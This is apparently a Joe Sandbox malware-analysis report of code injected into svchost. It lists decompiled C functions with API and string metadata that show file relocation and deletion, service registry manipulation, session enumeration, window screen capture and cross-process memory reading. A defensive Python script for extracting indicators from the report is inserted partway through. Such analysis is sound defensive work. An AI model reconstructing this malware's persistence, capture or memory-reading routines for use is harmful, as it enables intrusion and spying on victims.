                                                            				if (_t83 != 2) goto 0xaf549325;
                                                            				 *((intOrPtr*)(_t111 + 0x18)) = GetSystemMetrics(??);
                                                            				_t109 = _t111 -  &_v292;
                                                            				_t119 =  &_v292;
                                                            				_t30 = _t109 + 0x20; // 0x20
                                                            				_t66 =  *_t119 & 0x0000ffff;
                                                            				 *(_t30 + _t119) = _t66;
                                                            				if (_t66 != 0) goto 0xaf549340;
                                                            				_t67 =  *_t111;
                                                            				if (_t67 != 6) goto 0xaf54935d;
                                                            				if ( *((intOrPtr*)(_t111 + 4)) == 2) goto 0xaf549365;
                                                            				if (_t67 != 0) goto 0xaf5493ec;
                                                            				LoadLibraryA(??);
                                                            				GetProcAddress(??, ??);
                                                            				if (_t109 == 0) goto 0xaf549412;
                                                            				 *_t109();
                                                            				r8d = _v328 & 0x0000ffff;
                                                            				_t71 = _v320;
                                                            				_t84 = _v324;
                                                            				_v328 = r8d;
                                                            				_t100 = _t71 -  *_t111;
                                                            				if (_t100 > 0) goto 0xaf5493bc;
                                                            				if (_t100 != 0) goto 0xaf5493ec;
                                                            				if (_t84 -  *((intOrPtr*)(_t111 + 4)) <= 0) goto 0xaf5493ec;
                                                            				 *_t111 = _t71;
                                                            				 *((intOrPtr*)(_t111 + 4)) = _t84;
                                                            				 *(_t111 + 8) = r8d;
                                                            				dil = E0000022B22BAF549110() != 0;
                                                            				 *(_t111 + 0x1c) = 0;
                                                            				if ( *_t111 != 5) goto 0xaf5493ec;
                                                            				if ( *((intOrPtr*)(_t111 + 4)) != 2) goto 0xaf5493ec;
                                                            				 *((intOrPtr*)(_t111 + 0x18)) = GetSystemMetrics(??);
                                                            				return E0000022B22BAF55A7C0(0x59, _t109, _v24 ^ _t137 - 0x00000160);
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc$MetricsSystem$CurrentProcessVersion
                                                            • String ID: IsWow64Process$RtlGetNtVersionNumbers$kernel32.dll$ntdll.dll
                                                            • API String ID: 4138763130-3428624887
                                                            • Opcode ID: 238023d1d3f05cbb627d11bb3c3cf66febc071649d01eebc17dd589a71388bde
                                                            • Instruction ID: 2a37d3b74a718fd9a34be9b9cf92381b41e91f1dc2f4a5a5a3aa6ca95f76733e
                                                            • Opcode Fuzzy Hash: 238023d1d3f05cbb627d11bb3c3cf66febc071649d01eebc17dd589a71388bde
                                                            • Instruction Fuzzy Hash: C451AD73614680E6EB72CFA4E44E3DE77A2F788B45F448025D6498379ADF3AC905CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 22%
                                                            			E0000022B22BAF534A48(long long __rbx, void* __rdx, void* __rdi, long long _a176, char _a184) {
                                                            				void* _t15;
                                                            				long long _t16;
                                                            				void* _t25;
                                                            				void* _t26;
                                                            				void* _t34;
                                                            
                                                            				_t16 = __rbx;
                                                            				_t25 = __rdx + 1;
                                                            				_t26 = _t25 + 1;
                                                            				_pop(_t34);
                                                            				E0000022B22BAF534F40(_t15, __rbx, _t26 + 1);
                                                            				_a184 = 0x70;
                                                            				_a176 = _t16;
                                                            				lstrlenW(??);
                                                            				MoveFileW(??, ??);
                                                            				r9b = 0x3f;
                                                            				_a184 = 0x72;
                                                            				r8d = 1;
                                                            				return E0000022B22BAF531FF0( *((intOrPtr*)(_t34 + 8)),  &_a184);
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$lstrlen$FileFindFirstXinvalid_argumentstd::_wsprintf
                                                            • String ID: %s%s%s$\$l$l$list<T> too long
                                                            • API String ID: 3996218988-2465611164
                                                            • Opcode ID: 345699ce32a43e833db76184380aa3671030c28a2ace32929334ccd43e568248
                                                            • Instruction ID: cbf493c6751111ca193ab22411aeffe0ac0c925afabbc657e96eca5cecfc0b00
                                                            • Opcode Fuzzy Hash: 345699ce32a43e833db76184380aa3671030c28a2ace32929334ccd43e568248
                                                            • Instruction Fuzzy Hash: D941C433210649A1EA65ABD9D56C3ED73A1F744BE0F405A10ABAE07BD7DF79C0908340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocLocal$EnumOpen
                                                            • String ID:
                                                            • API String ID: 2229625058-0
                                                            • Opcode ID: 216ad08e7c1ce941cfd92014d764ad4381dc4b5f5fe508a19ec6f43c84a8389c
                                                            • Instruction ID: 81275523c3875bc1257a70bb31dafc180a2d817219258cf33fc1cbcd729d7075
                                                            • Opcode Fuzzy Hash: 216ad08e7c1ce941cfd92014d764ad4381dc4b5f5fe508a19ec6f43c84a8389c
                                                            • Instruction Fuzzy Hash: BA516933614A44E7EB219F5AF40C39EB7A1F784F80F451521EB8A43B69DF3AD4558B40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 60%
                                                            			E0000022B22BAF54F600(long long __rcx, long long __rdi, void* __rsi, void* __rbp, void* __r9, void* __r11, void* __r13, void* __r14, long long _a16) {
                                                            				signed int _v24;
                                                            				char _v552;
                                                            				char _v1080;
                                                            				char _v1608;
                                                            				char _v1816;
                                                            				char _v1832;
                                                            				void* __rbx;
                                                            				void* _t33;
                                                            				void* _t39;
                                                            				intOrPtr _t60;
                                                            				void* _t74;
                                                            				void* _t75;
                                                            				void* _t77;
                                                            				signed long long _t88;
                                                            				signed long long _t89;
                                                            				long long* _t90;
                                                            				char* _t118;
                                                            				signed long long _t126;
                                                            				void* _t128;
                                                            				void* _t129;
                                                            
                                                            				_t130 = __r13;
                                                            				_t129 = __r11;
                                                            				_t128 = __r9;
                                                            				_t125 = __rbp;
                                                            				_t124 = __rsi;
                                                            				_t88 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t89 = _t88 ^ _t126;
                                                            				_v24 = _t89;
                                                            				_t91 = __rcx;
                                                            				r8d = 0x104;
                                                            				GetModuleFileNameW(??, ??, ??);
                                                            				E0000022B22BAF563214(0x5c,  &_v1080);
                                                            				if (lstrcmpiW(??, ??) != 0) goto 0xaf54f691;
                                                            				_t118 =  &_v552;
                                                            				_t77 = E0000022B22BAF54F4B0(_t89, __rcx, _t118, __rbp,  &_v1608);
                                                            				if (_t77 == 0) goto 0xaf54f826;
                                                            				_t8 = _t118 + 4; // 0x4
                                                            				r8d = _t8;
                                                            				MoveFileExW(??, ??, ??);
                                                            				goto 0xaf54f6e6;
                                                            				r8d = 0x104;
                                                            				GetModuleFileNameW(??, ??, ??);
                                                            				_t33 = E0000022B22BAF563214(0x2e,  &_v1608);
                                                            				_t90 = _t89 + 2;
                                                            				if (_t77 == 0) goto 0xaf54f826;
                                                            				 *_t90 = 0x610064;
                                                            				__imp__PathFileExistsW();
                                                            				if (_t33 == 0) goto 0xaf54f826;
                                                            				_a16 = __rdi;
                                                            				r8d = 0xc8;
                                                            				E0000022B22BAF563830(0, 0, _t74, _t75,  &_v1816,  &_v1608, __rdi,  &_v1608);
                                                            				if (E0000022B22BAF54A9B0(0, 0, _t33, _t91,  &_v1816,  &_v1608, __rsi,  &_v1608) <= 0) goto 0xaf54f725;
                                                            				E0000022B22BAF54A5A0(_t35, E0000022B22BAF54A9B0(0, 0, _t33, _t91,  &_v1816,  &_v1608, __rsi,  &_v1608), _t91, _t124);
                                                            				E0000022B22BAF54A760(_t35, _t91,  &_v1816, _t125);
                                                            				goto 0xaf54f730;
                                                            				_t60 =  *0xaf597f00; // 0x38f
                                                            				E0000022B22BAF54A5A0(_t60, E0000022B22BAF54A9B0(0, 0, _t33, _t91,  &_v1816,  &_v1608, __rsi,  &_v1608), _t91, _t124);
                                                            				_t39 = E0000022B22BAF5491B0(_t90);
                                                            				r8d = 0;
                                                            				_v1832 = 0;
                                                            				r8b = _t39 != 0;
                                                            				r8d = r8d + 1;
                                                            				E0000022B22BAF54C3B0( &_v1832,  &_v1608, _t125, __r14);
                                                            				_t122 = _t90;
                                                            				if (_t90 == 0) goto 0xaf54f81e;
                                                            				_t56 = _v1832;
                                                            				if (_v1832 == 0) goto 0xaf54f81e;
                                                            				E0000022B22BAF54C2B0(_v1832, _v1832, _t91, _t90,  &_v1608, _t124,  &_v1608, _t129);
                                                            				E0000022B22BAF548CB0(_t56, _t90, _t90,  &_v1608,  &_v1608, _t128);
                                                            				if ((E0000022B22BAF54BFA0(_v1832, L"Control") + 0xe0000001 & 0xefffffff) != 0) goto 0xaf54f7ad;
                                                            				E0000022B22BAF538A60(0, _t91);
                                                            				if ((E0000022B22BAF54BFA0(E0000022B22BAF54BFA0(_v1832, L"Control") + 0xe0000001 & 0xefffffff, L"Dispatch") + 0xe0000001 & 0xefffffff) != 0) goto 0xaf54f7d3;
                                                            				E0000022B22BAF538A60(0, _t91);
                                                            				if (E0000022B22BAF54F0B0(_t56, _t91, _t90,  &_v1608, _t90, _t125, __r13) > 0) goto 0xaf54f7ff;
                                                            				E0000022B22BAF54EE60();
                                                            				Sleep(??);
                                                            				if (E0000022B22BAF54F0B0(_t56, _t91, _t90,  &_v1608, _t122, _t125, _t130) <= 0) goto 0xaf54f7e1;
                                                            				r8d = 0x8000;
                                                            				VirtualFree(??, ??, ??);
                                                            				DeleteFileW(??);
                                                            				return E0000022B22BAF55A7C0(0x3e8, _t90, _v24 ^ _t126);
                                                            			}
Address column (detached from the C listing above during extraction): 0x22baf54f600 to 0x22baf54f83e

Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
Similarity
• API ID: File$ModuleName$CloseDeleteExistsFreeMoveOpenPathQuerySleepValueVirtuallstrcmpiwsprintf
• String ID: Control$Dispatch$rundll32.exe
• API String ID: 2408718126-2251917905
• Opcode ID: c77019e427ca956446a1ecc44ce957802783c86c4c03a36e414da3326140ced2
• Instruction ID: 17993f3d0d1b6cfcaedaeb11ee31e773cacc27f05744352743c6babd2dfc3f97
• Opcode Fuzzy Hash: c77019e427ca956446a1ecc44ce957802783c86c4c03a36e414da3326140ced2
• Instruction Fuzzy Hash: CF518E33B1458072FB76EBE5E89E3EA7392EB84741F444021964E87ADBEF2EC5448740
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
Similarity
• API ID: AddressProc$LibraryLoad$Version
• String ID: Kernel32.dll$WTSEnumerateSessionsW$WTSFreeMemory$WTSGetActiveConsoleSessionId$Wtsapi32.dll
• API String ID: 158333003-4205620339
• Opcode ID: ff9c0f5ffa497d601606b2033e79c8c4b6dd3ad21fe27dec41a8244c8894fab7
• Instruction ID: 19e7dc93e3f68e40a9def7fc4155590d57a39dd355123f3807bc739550359305
• Opcode Fuzzy Hash: ff9c0f5ffa497d601606b2033e79c8c4b6dd3ad21fe27dec41a8244c8894fab7
• Instruction Fuzzy Hash: 1741E637711A84A7EBB6DF95E44D3D973A2F788B40F884025EA4A03756EF3AC945CB00
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
Similarity
• API ID: Window$Print$CompatibleCreateDeleteObject$BitmapRectSelect
• String ID:
• API String ID: 718922780-3916222277
• Opcode ID: 3ff7a732dab860e9fcb318fc0cd7c1670d7b86a6265b15641296e67d8a6d4be5
• Instruction ID: 5a8cf412ae841d89e372cbe0c8d602f41c48432933fffd58544c14aaabf4d31f
• Opcode Fuzzy Hash: 3ff7a732dab860e9fcb318fc0cd7c1670d7b86a6265b15641296e67d8a6d4be5
• Instruction Fuzzy Hash: ED41D1736246809AE6228B7AA45C75AF7A4FBC9BD4F108321E94553B1DEF7DC4868F00
Uniqueness Score: -1.00%
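The per-function metadata blocks in this report (API ID, String ID, API String ID, fuzzy hashes, Uniqueness Score) are what an analyst pulls out when turning a sandbox run into indicators. The Python below is an added example, not Joe Sandbox code and not part of the analysed sample: it parses blocks in that layout into records, splits the String ID field on the '$' separator the report itself uses, and buckets each string by its shape (GUID, registry path, module, executable, A/W-suffixed Win32 name). The sample input is constructed from the String ID, API ID and API String ID lines of six blocks on this page; the bucket names and the plain '$' split of the API ID field are this example's own conventions, because the report does not document how that field is grouped.

```python
import re
from typing import Dict, List

# Constructed sample: field lines of six metadata blocks copied from this
# report. The '$' separator between strings is the report's own notation.
SAMPLE = r"""
• API ID: File$ModuleName$CloseDeleteExistsFreeMoveOpenPathQuerySleepValueVirtuallstrcmpiwsprintf
• String ID: Control$Dispatch$rundll32.exe
• API String ID: 2408718126-2251917905
Uniqueness Score: -1.00%

• API ID: AddressProc$LibraryLoad$Version
• String ID: Kernel32.dll$WTSEnumerateSessionsW$WTSFreeMemory$WTSGetActiveConsoleSessionId$Wtsapi32.dll
• API String ID: 158333003-4205620339
Uniqueness Score: -1.00%

• API ID: Window$Print$CompatibleCreateDeleteObject$BitmapRectSelect
• String ID:
• API String ID: 718922780-3916222277
Uniqueness Score: -1.00%

• API ID: Locallstrlen$AllocWindow$ClassNameProcessSizeTextThreadstrrchr
• String ID: 5B3838F5-0C81-46D9-A4C0-6EA28CA3E942
• API String ID: 2497764485-3141347713
Uniqueness Score: -1.00%

• API ID: Close$CreateDeleteOpen
• String ID: SOFTWARE\Classes\.codein
• API String ID: 2517957394-3041101089
Uniqueness Score: -1.00%

• API ID: Service$CloseDeleteHandleOpen$ControlManagerQuerySleepStatuswsprintf
• String ID: SYSTEM\CurrentControlSet\Services\%s
• API String ID: 3594024867-2757632955
Uniqueness Score: -1.00%
"""

# "• Key: value" or "Key: value"; tab labels without a colon do not match.
FIELD = re.compile(r"^[•*-]?\s*([A-Za-z][A-Za-z ]*?):\s*(.*)$")
GUID = re.compile(r"^[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}$")
EXPORT_AW = re.compile(r"^[A-Z][A-Za-z0-9]+[AW]$")  # ANSI/Unicode-suffixed Win32 name


def parse_blocks(text: str) -> List[Dict]:
    """One record per block; a block ends at its 'Uniqueness Score' line."""
    records: List[Dict] = []
    current: Dict = {}
    for raw in text.splitlines():
        m = FIELD.match(raw.strip())
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "String ID":
            current["strings"] = [s for s in value.split("$") if s]
        elif key == "API ID":
            # The grouping inside this field is Joe Sandbox's own; only split it.
            current["api_groups"] = [s for s in value.split("$") if s]
        elif key == "Uniqueness Score":
            current["uniqueness"] = float(value.rstrip("%"))
            records.append(current)
            current = {}
        else:
            current[key.lower().replace(" ", "_")] = value
    if current:  # trailing block without a score line
        records.append(current)
    return records


def classify(s: str) -> str:
    """Bucket a String ID entry by its shape only; no semantic lookup."""
    upper = s.upper()
    if GUID.match(s):
        return "guid"
    if upper.startswith(("HKEY_", "SOFTWARE\\", "SYSTEM\\")):
        return "registry_path"
    if upper.endswith(".DLL"):
        return "module"
    if upper.endswith(".EXE"):
        return "executable"
    if EXPORT_AW.match(s):
        return "win32_export"
    return "string"  # e.g. WTSFreeMemory or Control: shape alone does not tell


def indicators(records: List[Dict]) -> Dict[str, List[str]]:
    """All strings across records, grouped by class, deduplicated and sorted."""
    buckets: Dict[str, set] = {}
    for rec in records:
        for s in rec.get("strings", []):
            buckets.setdefault(classify(s), set()).add(s)
    return {k: sorted(v) for k, v in buckets.items()}


if __name__ == "__main__":
    for cls, values in indicators(parse_blocks(SAMPLE)).items():
        print(f"{cls}: {values}")
```

Feed it the text of a whole report and every block is parsed the same way; the empty String ID of the PrintWindow block comes back as an empty list rather than breaking the parse. Names such as WTSFreeMemory stay in the generic "string" bucket on purpose: without an import table or export list there is nothing in the string itself to distinguish an API name from any other identifier, so the classifier does not guess.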

                                                            C-Code - Quality: 53%
                                                            			E0000022B22BAF548850(void* __ebx, long long __rbx, void* __rcx, signed long long* __rdx, long long __rdi, long long _a24, long long _a32) {
                                                            				signed int _v40;
                                                            				char _v1064;
                                                            				char _v2088;
                                                            				void* __rsi;
                                                            				int _t30;
                                                            				void* _t36;
                                                            				void* _t44;
                                                            				void* _t45;
                                                            				void* _t46;
                                                            				signed long long _t52;
                                                            				signed long long _t53;
                                                            				void* _t56;
                                                            				long long _t80;
                                                            				signed long long _t86;
                                                            				signed long long _t88;
                                                            				void* _t89;
                                                            
                                                            				_t80 = __rdi;
                                                            				_t52 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t53 = _t52 ^ _t88;
                                                            				_v40 = _t53;
                                                            				r8d = 0x400;
                                                            				E0000022B22BAF563830(_t36, 0, _t44, _t46,  &_v1064, __rdx, __rdi, _t89);
                                                            				r8d = 0x400;
                                                            				E0000022B22BAF563830(_t36, 0, _t44, _t46,  &_v2088, __rdx, _t80, _t89);
                                                            				r8d = 0x3ff;
                                                            				GetClassNameA(??, ??, ??);
                                                            				if (lstrlenA(??) == 0) goto 0xaf5489a0;
                                                            				if (E0000022B22BAF57A020(_t36, 0,  &_v2088, "5B3838F5-0C81-46D9-A4C0-6EA28CA3E942") != 0) goto 0xaf5489a0;
                                                            				r8d = 0x3ff;
                                                            				_a32 = _t80;
                                                            				GetWindowTextA(??, ??, ??);
                                                            				strrchr(??, ??);
                                                            				if (_t53 == 0) goto 0xaf548995;
                                                            				_a24 = __rbx;
                                                            				if ( *__rdx != 0) goto 0xaf548936;
                                                            				LocalAlloc(??, ??);
                                                            				LocalSize(??);
                                                            				lstrlenA(??);
                                                            				r8d = 0x42;
                                                            				LocalReAlloc(??, ??, ??);
                                                            				_t56 = _t53 + _t53;
                                                            				_t86 = _t53;
                                                            				GetWindowThreadProcessId(??, ??);
                                                            				_t30 = lstrlenA(??);
                                                            				_t14 = _t56 + 4; // 0x4
                                                            				E0000022B22BAF562BA0( *__rdx + 0x40, _t44, _t45, _t46, _t14, _t53 + 1, _t53 + 1, _t86, _t30 + 1);
                                                            				 *__rdx = _t86;
                                                            				return E0000022B22BAF55A7C0( *__rdx + 0x40, _t53, _v40 ^ _t88);
                                                            			}
Address column (detached from the C listing above during extraction): 0x22baf548850 to 0x22baf5489bd

Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
Similarity
• API ID: Locallstrlen$AllocWindow$ClassNameProcessSizeTextThreadstrrchr
• String ID: 5B3838F5-0C81-46D9-A4C0-6EA28CA3E942
• API String ID: 2497764485-3141347713
• Opcode ID: b2262892ffc972409063152210c879be32e342e92ed0c60b8a876b92dd153c6e
• Instruction ID: f1fd72ae941e5c3373e0f87aca1057a25cd4813584b25cb8c4d462753d697c4c
• Opcode Fuzzy Hash: b2262892ffc972409063152210c879be32e342e92ed0c60b8a876b92dd153c6e
• Instruction Fuzzy Hash: 16316562710A85A5EE75EF92E85C3DA7391FB89BC5F444021CE4A47B5ADF3EC106CB40
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
Similarity
• API ID: Close$CreateDeleteOpen
• String ID: SOFTWARE\Classes\.codein
• API String ID: 2517957394-3041101089
• Opcode ID: d51038d41aa24ffffb5a092243cc8de26b92506cbc57dae87f72e5684ffde561
• Instruction ID: aaae828e3e3dcf7765b4764b974b347c55277410019499d6a5e77eee526b36ba
• Opcode Fuzzy Hash: d51038d41aa24ffffb5a092243cc8de26b92506cbc57dae87f72e5684ffde561
• Instruction Fuzzy Hash: CC415077204B01E2EB218F95F89C78A7BA4F784794F440615EA9D43B69DF3ED189CB40
Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0000022B22BAF545F4B(void* __rax, long long __rbx, long long _a288) {
                                                            				int _t5;
                                                            				void* _t9;
                                                            				void* _t16;
                                                            				void* _t21;
                                                            				void* _t23;
                                                            				void* _t30;
                                                            				void* _t31;
                                                            				void* _t32;
                                                            
                                                            				_t9 = __rax;
                                                            				_pop(_t21);
                                                            				goto 0xaf546b40;
                                                            				_a288 = __rbx;
                                                            				E0000022B22BAF545FD0(_t16, _t21, _t23, _t30, _t31, _t32);
                                                            				if (_t9 == 0) goto 0xaf545fa9;
                                                            				_t5 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t5;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t21 + 8)), _t9);
                                                            				return LocalFree(??);
                                                            			}
Address column (detached from the C listing above during extraction): 0x22baf545f4b to 0x22baf545fb3

Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
Similarity
• API ID: Service$CloseDeleteHandleOpen$ControlManagerQuerySleepStatuswsprintf
• String ID: SYSTEM\CurrentControlSet\Services\%s
• API String ID: 3594024867-2757632955
• Opcode ID: 2b219ea6b56369f2154be6a0a472141b7a200e0bcbb87126cbeb6a65f44bcbe9
• Instruction ID: 20a0c3f21332c96ffa8dc0524c37fcb302efe79f45e88227b0d11c80813712b6
• Opcode Fuzzy Hash: 2b219ea6b56369f2154be6a0a472141b7a200e0bcbb87126cbeb6a65f44bcbe9
• Instruction Fuzzy Hash: F931A032704A44A2FF369BA2E85C3EAB3A1FB88B85F044125CD5D0779ADF3EC5058B40
Uniqueness Score: -1.00%

                                                            C-Code - Quality: 33%
                                                            			E0000022B22BAF5369C0(intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r9, long long __r14) {
                                                            				void* __rbx;
                                                            				void* __rdi;
                                                            				void* _t90;
                                                            				void* _t91;
                                                            				void* _t106;
                                                            				signed long long _t108;
                                                            				signed long long _t109;
                                                            				long long _t112;
                                                            				intOrPtr* _t113;
                                                            				intOrPtr* _t116;
                                                            				signed long long _t151;
                                                            				intOrPtr* _t156;
                                                            				void* _t158;
                                                            				void* _t159;
                                                            				signed long long _t160;
                                                            				long long _t172;
                                                            				signed long long _t175;
                                                            
                                                            				_t158 = _t159 - 0x730;
                                                            				_t160 = _t159 - 0x830;
                                                            				_t108 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t109 = _t108 ^ _t160;
                                                            				 *(_t158 + 0x720) = _t109;
                                                            				_t116 = __rcx;
                                                            				GetModuleHandleA(??);
                                                            				r12d = 0;
                                                            				if (_t109 != 0) goto 0xaf536a1a;
                                                            				LoadLibraryA(??);
                                                            				if (_t109 != 0) goto 0xaf536a1a;
                                                            				goto 0xaf536a2d;
                                                            				GetProcAddress(??, ??);
                                                            				_t151 = _t109;
                                                            				 *((long long*)(_t160 + 0x878)) = __r14;
                                                            				GetModuleHandleA(??);
                                                            				if (_t109 != 0) goto 0xaf536a5e;
                                                            				LoadLibraryA(??);
                                                            				if (_t109 != 0) goto 0xaf536a5e;
                                                            				goto 0xaf536a71;
                                                            				GetProcAddress(??, ??);
                                                            				_t175 = _t109;
                                                            				if (_t151 == 0) goto 0xaf536c89;
                                                            				if (_t175 == 0) goto 0xaf536c89;
                                                            				 *((long long*)(_t160 + 0x30)) = _t172;
                                                            				 *(_t160 + 0x38) = _t109;
                                                            				 *(_t160 + 0x40) = _t109;
                                                            				r9d = 0x30;
                                                            				 *(_t160 + 0x48) = _t109;
                                                            				 *(_t160 + 0x50) = _t109;
                                                            				 *(_t160 + 0x58) = _t109;
                                                            				 *(_t160 + 0x60) = _t109;
                                                            				 *((long long*)(_t160 + 0x20)) = _t160 + 0x30;
                                                            				 *_t151();
                                                            				if (0 < 0) goto 0xaf536c89;
                                                            				if ( *((long long*)(_t160 + 0x30)) != 0x30) goto 0xaf536c89;
                                                            				r9d = 0x388;
                                                            				 *((long long*)(_t160 + 0x20)) = _t160 + 0x30;
                                                            				 *_t175();
                                                            				if (0 < 0) goto 0xaf536c89;
                                                            				if ( *((long long*)(_t160 + 0x30)) != 0x388) goto 0xaf536c89;
                                                            				_t112 = _t160 + 0x30;
                                                            				r9d = 0x3f8;
                                                            				 *((long long*)(_t160 + 0x20)) = _t112;
                                                            				 *_t175();
                                                            				if (0 < 0) goto 0xaf536c89;
                                                            				if ( *((long long*)(_t160 + 0x30)) != 0x3f8) goto 0xaf536c89;
                                                            				 *((long long*)(_t160 + 0x870)) = __rsi;
                                                            				_t113 =  <  ? 0xffffffff : _t112;
                                                            				E0000022B22BAF55A828(2 * (__rdx + 1) >> 0x20, _t113);
                                                            				r8d =  *(_t158 - 0x20) & 0x0000ffff;
                                                            				_t156 = _t113;
                                                            				E0000022B22BAF563830( *(_t158 - 0x20) & 0x0000ffff, 0, r12d, _t91, _t113,  *((intOrPtr*)(_t158 + 0x390)), 0xffffffff, 2 + (_t160 + 0x70) * 2);
                                                            				r9d =  *(_t158 - 0x20) & 0x0000ffff;
                                                            				 *((long long*)(_t160 + 0x20)) = _t160 + 0x30;
                                                            				 *_t175();
                                                            				 *((long long*)(_t158 + 0x718)) = 7;
                                                            				 *((long long*)(_t158 + 0x710)) = _t172;
                                                            				 *((intOrPtr*)(_t158 + 0x700)) = r12w;
                                                            				if ( *_t156 != r12w) goto 0xaf536bd0;
                                                            				goto 0xaf536bda;
                                                            				if ( *((intOrPtr*)(_t156 + (_t172 + 1) * 2)) != r12w) goto 0xaf536bd0;
                                                            				E0000022B22BAF533B50(_t116, _t158 + 0x700, _t156, _t156, _t172 + 1);
                                                            				E0000022B22BAF55A7E4(_t160 + 0x30, _t156);
                                                            				 *((long long*)(_t116 + 0x18)) = 7;
                                                            				 *((long long*)(_t116 + 0x10)) = _t172;
                                                            				 *_t116 = r12w;
                                                            				_t106 =  *((intOrPtr*)(_t158 + 0x718)) - 8;
                                                            				if (_t106 >= 0) goto 0xaf536c41;
                                                            				if (_t106 == 0) goto 0xaf536c52;
                                                            				E0000022B22BAF562BA0( *(_t158 - 0x20) & 0x0000ffff, r12d, _t90, _t91, _t116, _t158 + 0x700, _t172 + 1,  *((intOrPtr*)(_t160 + 0x870)),  *((intOrPtr*)(_t158 + 0x710)) + 1 +  *((intOrPtr*)(_t158 + 0x710)) + 1);
                                                            				goto 0xaf536c52;
                                                            				 *_t116 =  *((intOrPtr*)(_t158 + 0x700));
                                                            				 *((long long*)(_t158 + 0x700)) = _t172;
                                                            				 *((long long*)(_t116 + 0x10)) =  *((intOrPtr*)(_t158 + 0x710));
                                                            				 *((long long*)(_t116 + 0x18)) =  *((intOrPtr*)(_t158 + 0x718));
                                                            				 *((long long*)(_t158 + 0x718)) = 7;
                                                            				 *((long long*)(_t158 + 0x710)) = _t172;
                                                            				 *((intOrPtr*)(_t158 + 0x700)) = r12w;
                                                            				E0000022B22BAF5339E0( *(_t158 - 0x20) & 0x0000ffff, _t158 + 0x700);
                                                            				goto 0xaf536cab;
                                                            				 *((long long*)(_t116 + 0x18)) = 7;
                                                            				 *((long long*)(_t116 + 0x10)) = _t172;
                                                            				r8d = 0;
                                                            				 *_t116 = r12w;
                                                            				E0000022B22BAF533B50(_t116, _t116, 0xaf586058,  *((intOrPtr*)(_t160 + 0x870)),  *((intOrPtr*)(_t158 + 0x710)) + 1 +  *((intOrPtr*)(_t158 + 0x710)) + 1);
                                                            				return E0000022B22BAF55A7C0( *(_t158 - 0x20) & 0x0000ffff, _t116,  *(_t158 + 0x720) ^ _t160);
                                                            			}

                                                            Instruction addresses for the function above: 0x22baf5369c8 to 0x22baf536cd3

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                            • String ID: 0$NtWow64QueryInformationProcess64$NtWow64ReadVirtualMemory64$ntdll.dll
                                                            • API String ID: 310444273-3583746680
                                                            • Opcode ID: 9f4c9a20cd58477a0b8681746b0ded6acf4622161b753e07d396b435625f0707
                                                            • Instruction ID: 71729ddf5b6573295294119e01927eced3bc9df0e66e538c85696c5957219e51
                                                            • Opcode Fuzzy Hash: 9f4c9a20cd58477a0b8681746b0ded6acf4622161b753e07d396b435625f0707
